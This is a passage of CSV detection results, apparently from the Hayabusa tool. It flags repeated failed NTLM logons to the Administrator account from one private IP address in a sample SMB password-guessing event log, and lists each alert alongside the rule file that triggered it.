Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 